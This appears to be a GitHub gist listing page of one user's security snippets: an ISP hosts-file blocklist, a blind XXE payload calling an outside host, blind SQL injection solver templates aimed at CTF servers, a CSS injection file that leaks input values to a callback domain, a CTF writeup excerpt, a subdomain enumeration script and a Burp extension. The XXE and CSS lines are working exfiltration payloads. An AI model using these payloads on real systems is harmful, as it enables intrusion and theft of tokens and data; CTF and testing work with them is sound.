Skip to content

Instantly share code, notes, and snippets.

@abdilahrf
abdilahrf / hosts
Last active Oct 27, 2021
Blokir hostname INDIHOM* ke localhost kita biar kapok, untuk linux tambahin di file /etc/hosts & windows /System32/drivers/etc/hosts
View hosts
# INDIHOM*
127.0.0.1 x-tags.net
127.0.0.1 a01.uadexchange.com
127.0.0.1 cdn.uzone.id
127.0.0.1 cdn3.uzone.id
127.0.0.1 cfs.uzone.id
127.0.0.1 csf.uzone.id
127.0.0.1 d01.notifa.info
127.0.0.1 d31qbv1cthcecs.cloudfront.net
127.0.0.1 d5nxst8fruw4z.cloudfront.net
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View burplist.py
import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file.
# python burplist.py burprequests.xml
# output is saved to wordlist.txt
@abdilahrf
abdilahrf / blind_sqlinjection.py
Last active Dec 8, 2020
Blind SQL injection Template
View blind_sqlinjection.py
import requests
import re
url = "http://88.198.233.174:33534/index.php"
payload = {
"username":"",
"password":"x",
}
def check(data):
View evil.css
input[name$=code_1][value^=a]{background-image: url(https://callback.yourdomain.com/callback?token=a&id=CODE_1);}
input[name$=code_1][value^=b]{background-image: url(https://callback.yourdomain.com/callback?token=b&id=CODE_1);}
input[name$=code_1][value^=c]{background-image: url(https://callback.yourdomain.com/callback?token=c&id=CODE_1);}
input[name$=code_1][value^=d]{background-image: url(https://callback.yourdomain.com/callback?token=d&id=CODE_1);}
input[name$=code_1][value^=e]{background-image: url(https://callback.yourdomain.com/callback?token=e&id=CODE_1);}
input[name$=code_1][value^=f]{background-image: url(https://callback.yourdomain.com/callback?token=f&id=CODE_1);}
input[name$=code_1][value^=g]{background-image: url(https://callback.yourdomain.com/callback?token=g&id=CODE_1);}
input[name$=code_1][value^=h]{background-image: url(https://callback.yourdomain.com/callback?token=h&id=CODE_1);}
input[name$=code_1][value^=i]{background-image: url(https://callback.yourdomain.com/callback?token=i&id=CODE_1);
@abdilahrf
abdilahrf / a-z.md
Created Apr 27, 2020 — forked from stypr/a-z.md
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)
View a-z.md

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)
@abdilahrf
abdilahrf / a-z.md
Created Apr 27, 2020 — forked from stypr/a-z.md
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)
View a-z.md

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)
@abdilahrf
abdilahrf / crt.sh
Created Sep 13, 2017 — forked from 1N3/crt.sh
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
View crt.sh
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
@abdilahrf
abdilahrf / legcountersolve.py
Last active Oct 3, 2019
Leg counter web challenges solver (Blind SQLi Template)
View legcountersolve.py
import requests
import re
from StringIO import StringIO
from pycurl import *
import os
import pickle
url = "http://103.56.207.107:50001/upload.php"
payload = {
@abdilahrf
abdilahrf / dynamic_hmac_signature.py
Created Oct 3, 2019
Burpsuite extender for dynamically generate signature
View dynamic_hmac_signature.py
from burp import IBurpExtender
from burp import IHttpListener
from burp import IProxyListener
from burp import IScannerListener
from burp import IExtensionStateListener
from java.io import PrintWriter
from burp import IParameter
import datetime
import hashlib